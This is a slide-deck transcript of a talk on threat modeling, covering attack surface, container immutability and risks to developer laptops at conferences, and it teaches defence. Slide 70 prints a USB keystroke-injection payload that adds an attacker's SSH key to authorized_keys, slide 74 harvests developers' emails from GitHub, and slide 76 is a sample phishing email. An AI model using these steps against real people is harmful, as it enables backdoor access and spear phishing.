Tweet
Tweet

Slide 1

Slide 1 text

(without introducing more risk) Thinking Evil Thoughts Puppet Gareth Rushgrove A taste of threat modeling

Slide 2

Slide 2 text

(without introducing more risk) @garethr

Slide 3

Slide 3 text

(without introducing more risk) Gareth Rushgrove

Slide 4

Slide 4 text

(without introducing more risk) This Talk What to expect

Slide 5

Slide 5 text

- What is threat modeling? - Getting the scope right - Identifying risks - Using conferences to hack people Gareth Rushgrove

Slide 6

Slide 6 text

Introduce some security language to help you navigate the domain Gareth Rushgrove

Slide 7

Slide 7 text

Dive straight into examples Gareth Rushgrove

Slide 8

Slide 8 text

Empower you to ask questions more than provide easy answers Gareth Rushgrove

Slide 9

Slide 9 text

(without introducing more risk) Threat modeling A brief introduction

Slide 10

Slide 10 text

Gareth Rushgrove a procedure for optimizing network security by identifying objectives and vulnerabilities THREAT MODELING

Slide 11

Slide 11 text

- Determine scope - Identify threat agents and attacks - Understand existing countermeasures - Identify vulnerabilities - Prioritise risks - Identify countermeasures Gareth Rushgrove https://www.owasp.org/index.php/Category:Threat_Modeling

Slide 12

Slide 12 text

Inside each of us, there is the seed of both good and evil. It's a constant struggle as to which one will win. Gareth Rushgrove “ ” Eric Burdon

Slide 13

Slide 13 text

(without introducing more risk) Think evil.

Slide 14

Slide 14 text

(without introducing more risk) Getting the scope rights Avoiding gaps in your threat model

Slide 15

Slide 15 text

Ignoring part of your system when considering security is a common mistake Gareth Rushgrove

Slide 16

Slide 16 text

Gareth Rushgrove the attack surface of a software environment is the sum of the different points (the "attack vectors") where an unauthorized user (the "attacker") can try to enter data to or extract data from an environment. ATTACK SURFACE

Slide 17

Slide 17 text

(without introducing more risk) Example What is Production? Gareth Rushgrove

Slide 18

Slide 18 text

LOAD BALANCER FRONT END BACK END DATABASE PRODUCTION?

Slide 19

Slide 19 text

LOAD BALANCER FRONT END BACK END DATABASE PRODUCTION? PEOPLE DESKTOPS CI SERVER

Slide 20

Slide 20 text

LOAD BALANCER FRONT END BACK END DATABASE PRODUCTION? PEOPLE DESKTOPS CI SERVER HYPERVISOR MANAGEMENT MONITORING

Slide 21

Slide 21 text

Do you protect your CI stack as well as your production database? Gareth Rushgrove

Slide 22

Slide 22 text

Could I execute a query on your production database if I compromised your CI server? Gareth Rushgrove

Slide 23

Slide 23 text

Example Third party services Gareth Rushgrove

Slide 24

Slide 24 text

Gareth Rushgrove an entity which facilitates interactions between two parties who both trust the third party TRUSTED THIRD PARTY

Slide 25

Slide 25 text

Gareth Rushgrove a term in computer science and security used to describe a boundary where program data or execution changes its level of "trust". The term refers to any distinct boundary within which a system trusts all sub-systems (including data). TRUST BOUNDARY

Slide 26

Slide 26 text

Gareth Rushgrove

Slide 27

Slide 27 text

Why Serverless is a bad name Gareth Rushgrove

Slide 28

Slide 28 text

(without introducing more risk) There are still servers somewhere Gareth Rushgrove

Slide 29

Slide 29 text

How you think about the servers changes, and the respective risks and mitigations change. But servers still exist. Gareth Rushgrove

Slide 30

Slide 30 text

Why NoOps is a bad name Gareth Rushgrove

Slide 31

Slide 31 text

No content

Slide 32

Slide 32 text

No content

Slide 33

Slide 33 text

How you think about operations changes, and the respective risks and mitigations change. But operations still exist. Gareth Rushgrove

Slide 34

Slide 34 text

Your attack surface is bigger than you think Gareth Rushgrove

Slide 35

Slide 35 text

(without introducing more risk) Identifying risks The need to understand your system

Slide 36

Slide 36 text

Differences in how you perceive a system and how it actually works can be used to exploit it Gareth Rushgrove

Slide 37

Slide 37 text

Example Immutable infrastructure Gareth Rushgrove

Slide 38

Slide 38 text

Out systems are immutable, we don’t need runtime file integrity checking Gareth Rushgrove “ ” A possibly naive developer

Slide 39

Slide 39 text

Gareth Rushgrove unchanging over time or unable to be changed. synonyms: unchangeable, fixed IMMUTABLE

Slide 40

Slide 40 text

(without introducing more risk) Containers are not immutable by default Gareth Rushgrove

Slide 41

Slide 41 text

(without introducing more risk) Containers are not immutable by default Gareth Rushgrove

Slide 42

Slide 42 text

(without introducing more risk) Gareth Rushgrove $ docker run -d alpine /bin/sh \ -c "while true; do echo hello world; sleep 1; done"

Slide 43

Slide 43 text

(without introducing more risk) Gareth Rushgrove $ docker exec a7a01beb14de touch /tmp/surprise

Slide 44

Slide 44 text

(without introducing more risk) Gareth Rushgrove $ docker diff a7a01beb14de C /tmp A /tmp/surprise

Slide 45

Slide 45 text

(without introducing more risk) Gareth Rushgrove $ docker run --read-only -d alpine /bin/sh \ -c "while true; do echo hello world; sleep 1; done"

Slide 46

Slide 46 text

(without introducing more risk) Gareth Rushgrove $ docker exec 379150b2cf05 touch /tmp/surprise touch: cannot touch '/tmp/surprise': Read-only file syste

Slide 47

Slide 47 text

(without introducing more risk) Do your immutable EC2 instances have read-only filesystems? Gareth Rushgrove

Slide 48

Slide 48 text

(without introducing more risk) Most Immutable Infrastructure isn’t Gareth Rushgrove

Slide 49

Slide 49 text

(without introducing more risk) Without technical controls you only have social guarantees of immutability Gareth Rushgrove

Slide 50

Slide 50 text

(without introducing more risk) Hacking conferences Looking for vulnerabilities

Slide 51

Slide 51 text

Let’s assume your applications and infrastructure are super secure* Gareth Rushgrove * This probably isn’t true. You should worry about that as well.

Slide 52

Slide 52 text

- Penetration testing - Intrusion detection system - Web application firewall - Network firewalls - Malware scanning - Configuration management Gareth Rushgrove

Slide 53

Slide 53 text

Gareth Rushgrove How secure is your laptop?

Slide 54

Slide 54 text

- Hand maintained configuration - Updated whenever - No central monitoring - Administrative access - Single factor authentication Gareth Rushgrove

Slide 55

Slide 55 text

Can you push new Docker images from your laptop? Gareth Rushgrove

Slide 56

Slide 56 text

Can you create jobs on your Jenkins instance from your laptop? Gareth Rushgrove

Slide 57

Slide 57 text

Can you launch new replication controllers from your laptop? Gareth Rushgrove

Slide 58

Slide 58 text

Can you release new functions to Lambda from your laptop? Gareth Rushgrove

Slide 59

Slide 59 text

Real world threat

Slide 60

Slide 60 text

(without introducing more risk) As a hacker how do I own your laptop? The fun stuff

Slide 61

Slide 61 text

Where can I find hundreds of developer laptops… Gareth Rushgrove

Slide 62

Slide 62 text

Developer Conferences are a Target Rich Environment Gareth Rushgrove

Slide 63

Slide 63 text

Gareth Rushgrove More Internet Some Internet Marks iPhone FREE CONFERENCE WIFI Hacked Android CONFERENCE VENUE Private Software Circus Company next door Coffee shop downstairs Software Circus II Docker Corp Avengers Tower FON My Blackberry Nokia4ever ABANK

Slide 64

Slide 64 text

Gareth Rushgrove More Internet Some Internet Marks iPhone FREE CONFERENCE WIFI Hacked Android CONFERENCE VENUE Private Software Circus Company next door Coffee shop downstairs Software Circus II Docker Corp Avengers Tower FON My Blackberry Nokia4ever ABANK This is the official conference wifi right?

Slide 65

Slide 65 text

Gareth Rushgrove More Internet Some Internet Marks iPhone FREE CONFERENCE WIFI Hacked Android CONFERENCE VENUE Private Software Circus Company next door Coffee shop downstairs Software Circus II Docker Corp Avengers Tower FON My Blackberry Nokia4ever ABANK Or is it this one? Whatever, both work

Slide 66

Slide 66 text

Devices exist to man-in-the-middle wireless networks Gareth Rushgrove

Slide 67

Slide 67 text

Who has ever picked up a USB memory stick at a conference? Gareth Rushgrove

Slide 68

Slide 68 text

Gareth Rushgrove

Slide 69

Slide 69 text

USB devices exist which will run a script on connect (normally by impersonating a keyboard) Gareth Rushgrove

Slide 70

Slide 70 text

(without introducing more risk) DELAY 1000 COMMAND SPACE DELAY 500 STRING Terminal DELAY 500 ENTER DELAY 800 STRING echo 'RSA_PUB_ID' >> ~/.ssh/authorized_keys ENTER DELAY 1000 STRING killall Terminal ENTER Add my public key https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Passwordless-SSH-access-%28ssh-keys%29

Slide 71

Slide 71 text

Local databases

Slide 72

Slide 72 text

Lots of people here are on Twitter and using the conference hashtag Gareth Rushgrove

Slide 73

Slide 73 text

Lots of people here are on GitHub with the same username Gareth Rushgrove

Slide 74

Slide 74 text

(without introducing more risk) $ curl -s https://api.github.com/users//events/public \ | jq '.[].payload.commits[0].author.email' \ | sort \ | uniq \ | grep -v "null" Email from GitHub user

Slide 75

Slide 75 text

an e-mail spoofing fraud attempt that targets a specific organization or individual, seeking unauthorized access to confidential data. Gareth Rushgrove SPEAR PHISHING

Slide 76

Slide 76 text

Hi Great to see you at last week. I thought you’d be interested in the container testing tool I mentioned. http://nothingevilhere.com. Would love to know what you think. Hopefully see you at DockerCon next year too.

Slide 77

Slide 77 text

(without introducing more risk) So you’re saying we’re all doomed? This is quite depressing now I think about it

Slide 78

Slide 78 text

Part of threat modeling is coming up with suitable mitigations to the risks identified Gareth Rushgrove

Slide 79

Slide 79 text

- 2 factor authentication - Time-limited credentials - Separation of duties - Two person rule - Configuration management Gareth Rushgrove

Slide 80

Slide 80 text

having more than one person required to complete a task. In business the separation by sharing of more than one individual in one single task is an internal control intended to prevent fraud and error. Gareth Rushgrove SEPARATION OF DUTIES

Slide 81

Slide 81 text

a control mechanism designed to achieve a high level of security for especially critical material or operations. Under this rule all access and actions requires the presence of two authorized people at all times. Gareth Rushgrove TWO-PERSON RULE

Slide 82

Slide 82 text

Gareth Rushgrove a process that identifies critical information to determine if friendly actions can be observed by enemy intelligence and determines if information obtained by adversaries could be interpreted to be useful to them. OPERATIONAL SECURITY (OPSEC)

Slide 83

Slide 83 text

Once you understand the threat you can seek out specific guidance Gareth Rushgrove

Slide 84

Slide 84 text

No content

Slide 85

Slide 85 text

- Protect data in transit - Protect data at rest - Authentication - Secure boot - Platform integrity and sandboxing - Application whitelisting Gareth Rushgrove - Malicious code detection - Security policy enforcement - External interface protection - Device update policy - Event collection and analysis - Incident response https://www.cesg.gov.uk/guidance/end-user-devices-security-principles

Slide 86

Slide 86 text

Education. Education. Education. Gareth Rushgrove

Slide 87

Slide 87 text

Gareth Rushgrove

Slide 88

Slide 88 text

(without introducing more risk) Conclusions If all you remember is…

Slide 89

Slide 89 text

With Cloud Native approaches developers are nearer to production than ever before Gareth Rushgrove

Slide 90

Slide 90 text

The efficiency of modern tooling introduces new threats, and magnifies existing ones Gareth Rushgrove

Slide 91

Slide 91 text

Existing mitigations and security controls won’t be enough. You need to collaborate with security colleagues on new approaches Gareth Rushgrove

Slide 92

Slide 92 text

Threat modeling should be part of your development process Gareth Rushgrove

Slide 93

Slide 93 text

Gareth Rushgrove

Slide 94

Slide 94 text

Elevation of privilege

Slide 95

Slide 95 text

Gareth Rushgrove

Slide 96

Slide 96 text

(without introducing more risk) Thanks And any questions?